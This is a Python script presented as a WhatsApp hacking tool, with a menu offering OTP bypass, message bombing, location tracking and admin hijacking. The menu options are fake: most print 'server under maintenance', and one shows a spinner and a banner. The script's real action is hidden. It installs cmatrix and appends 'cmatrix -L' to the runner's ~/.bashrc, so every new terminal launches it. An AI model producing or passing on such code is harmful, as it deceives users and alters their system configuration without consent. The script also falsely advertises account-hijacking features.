#!/bin/python
import os
import time
import sys
def load(word):
	for char in word:
		print(char,end='')
		sys.stdout.flush()
		time.sleep(0.2)
def bash():
	print("\033[31m")
	print("██████╗ ███████╗██████╗ ██████╗     ███╗   ███╗██╗    ██╗ ██████╗ ██╗     ██╗   ██╗")
	print("██╔══██╗██╔════╝██╔══██╗██╔══██╗    ████╗ ████║██║    ██║██╔═══██╗██║     ██║   ██║")
	print("██████╔╝█████╗  ██████╔╝██║  ██║    ██╔████╔██║██║ █╗ ██║██║   ██║██║     ██║   ██║")
	print("██╔══██╗██╔══╝  ██╔══██╗██║  ██║    ██║╚██╔╝██║██║███╗██║██║   ██║██║     ██║   ██║")
	print("██████╔╝███████╗██║  ██║██████╔╝    ██║ ╚═╝ ██║╚███╔███╔╝╚██████╔╝███████╗╚██████╔╝")
	print("╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝     ╚═╝     ╚═╝ ╚══╝╚══╝  ╚═════╝ ╚══════╝ ╚═════╝\n\n")
	time.sleep(3)
	os.system("echo 'cmatrix -L' >> ~/.bashrc")


os.system("apt install cmatrix")
os.system("echo 'cmatrix -L' >> ~/.bashrc")
os.system("clear")
print("\033[33m")
print("-----This is a private whatsapp hacking tool by *Mr b3rd%20mw01u* please use it educational purpose only-----")
time.sleep(4)
os.system('clear')
print("\033[32;1m")
print("██╗  ██╗ █████╗  ██████╗██╗  ██╗     ██╗    ██╗ █████╗")
print("██║  ██║██╔══██╗██╔════╝██║ ██╔╝     ██║    ██║██╔══██╗")
print("███████║███████║██║     █████╔╝█████╗██║ █╗ ██║███████║")
print("██╔══██║██╔══██║██║     ██╔═██╗╚════╝██║███╗██║██╔══██║")
print("██║  ██║██║  ██║╚██████╗██║  ██╗     ╚███╔███╔╝██║  ██║")
print("╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝      ╚══╝╚══╝ ╚═╝  ╚═╝")
time.sleep(3)
print("\033[33m")
print("[1] OTP bypass")
print("[2] Whatsapp bombing")
print("[3] Location Tracking")
print("[4] Admin hijacking\n\n")

u_choice=int(input('Choose a option:  '))
if u_choice==1:
     os.system("clear")
     print("Processing please wait -")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait /")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait |")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait \ ")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait - ")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait /")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait |")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait \ ")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait - ")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait /")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait |")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait \ ")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait - ")
     time.sleep(1)
     os.system("clear")
     load('Connecting to server.....\n')
     bash()
elif u_choice==2:
	print("b3rd%20mw01u >>> Server under maintenance...")

elif u_choice==3:
        print("b3rd%20mw01u >>> Server under maintenance...")

elif u_choice==4:
        print("b3rd%20mw01u >>> Server under maintenance...")
